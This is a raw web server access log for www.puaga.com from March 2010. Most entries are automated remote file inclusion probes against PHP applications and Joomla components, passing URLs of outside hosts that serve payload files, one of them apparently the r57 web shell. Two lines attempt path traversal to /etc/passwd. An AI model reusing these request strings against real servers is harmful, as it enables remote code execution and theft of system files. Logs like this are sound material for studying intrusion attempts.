77.225.42.178 - - [01/Mar/2010:07:51:03 -0800] "GET /appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:03 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:07 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:33 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:33 -0800] "GET /appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:33 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:51:39 -0800] "GET /logs/access_100212.log/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:52:01 -0800] "GET /appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:52:02 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:52:02 -0800] "GET /logs/access_100126.log%20%20/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:07:52:10 -0800] "GET /logs/access_100212.log%20%20/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:52:31 -0800] "GET /logs///////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:52:31 -0800] "GET /logs/access_100125.log%20%20///////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:52:31 -0800] "GET //////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:52:50 -0800] "GET /appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:52:50 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:52:50 -0800] "GET /logs/access_100126.log%20%20/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:07:52:53 -0800] "GET /logs/access_100217.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:07:52:54 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:52:54 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:07:52:57 -0800] "GET /logs/access_100212.log%20%20/appserv/main.php?appserv_root=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:07:52:58 -0800] "GET /logs/access_100203.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:53:01 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [01/Mar/2010:07:53:17 -0800] "GET /logs///?mosConfig_absolute_path=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 200 4948 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
193.111.95.42 - - [01/Mar/2010:07:53:18 -0800] "GET //?mosConfig_absolute_path=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:29 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:29 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:29 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:53:30 -0800] "GET //////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:53:31 -0800] "GET /logs///////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:53:31 -0800] "GET /logs/access_100125.log///////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:31 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:31 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:31 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:53:35 -0800] "GET /logs/access_100206.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:02 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:02 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:02 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:03 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:03 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:54:03 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:54:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:07:54:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:55:36 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:55:38 -0800] "GET /logs/access_100221.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:07:55:44 -0800] "GET /logs/access_100125.log///////administrator/components/com_zoom/zoom.php?mosConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:56:05 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.143.198 - - [01/Mar/2010:07:56:07 -0800] "GET /logs/access_100221.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:56:52 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:07:56:59 -0800] "GET /logs/access_100210.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:07:57:06 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:57:29 -0800] "GET /logs/access_100209.log///admin/classes/TplLoad.php?full_path_to_public_program=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:57:29 -0800] "GET /logs///admin/classes/TplLoad.php?full_path_to_public_program=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:07:57:29 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:36 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:55 -0800] "GET /robots.txt HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "akifbar.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:56 -0800] "GET / HTTP/1.1" 302 2624 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "akifbar.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:57 -0800] "GET /robots.txt HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "simple.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.pixero.net"
204.236.212.138 - - [01/Mar/2010:07:57:57 -0800] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "simple.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:58 -0800] "GET /diger/ HTTP/1.1" 200 3545 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.puaga.com"
204.236.212.138 - - [01/Mar/2010:07:57:58 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "www.pixero.net"
216.119.103.16 - - [01/Mar/2010:08:00:20 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:08:00:20 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:08:00:20 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:08:00:27 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:08:00:36 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:08:00:36 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:08:00:36 -0800] "GET /logs/access_100201.log//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [01/Mar/2010:08:01:10 -0800] "GET /logs/?M=D HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:03:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:03:24 -0800] "GET /logs/access_100217.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:03:25 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:03:44 -0800] "GET /logs/access_100203.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:04:08 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:04:08 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:04:08 -0800] "GET /logs/access_100218.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:04:25 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:04:25 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:08:04:48 -0800] "GET /logs//common/db.php?commonpath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:08:04:48 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.92.23.144 - - [01/Mar/2010:08:04:48 -0800] "GET /common/db.php?commonpath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.59.49 - - [01/Mar/2010:08:06:25 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.59.49 - - [01/Mar/2010:08:06:26 -0800] "GET /orange_g/forum/viewtopic.php?p=15223 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
123.143.29.250 - - [01/Mar/2010:08:06:29 -0800] "GET /performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:06:29 -0800] "GET /logs/access_100219.log%20%20//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:06:30 -0800] "GET /logs//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:06:44 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:06:45 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:06:49 -0800] "GET /logs/access_100218.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:07:47 -0800] "GET /logs/access_100221.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:08:33 -0800] "GET /logs/access_100221.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:08:44 -0800] "GET /logs/access_100215.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.152.137 - - [01/Mar/2010:08:08:53 -0800] "GET /index1.php?page=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.225.152.137 - - [01/Mar/2010:08:08:53 -0800] "GET /index1.php?page=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.195.115.26 - - [01/Mar/2010:08:09:43 -0800] "GET /ideal/?D=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
122.200.145.254 - - [01/Mar/2010:08:10:03 -0800] "GET /logs/access_100202.log/http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
122.200.145.254 - - [01/Mar/2010:08:10:04 -0800] "GET /http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
122.200.145.254 - - [01/Mar/2010:08:10:04 -0800] "GET /logs/http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
122.200.145.254 - - [01/Mar/2010:08:10:24 -0800] "GET /logs/access_100217.log/http://mc-crew.org/file/r57.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.832" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:10:33 -0800] "GET /logs/access_100215.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:10:35 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:10:35 -0800] "GET /logs/access_100221.log%20%20//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:10:35 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:10:35 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:11:23 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:11:23 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:11:23 -0800] "GET /logs/access_100221.log//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
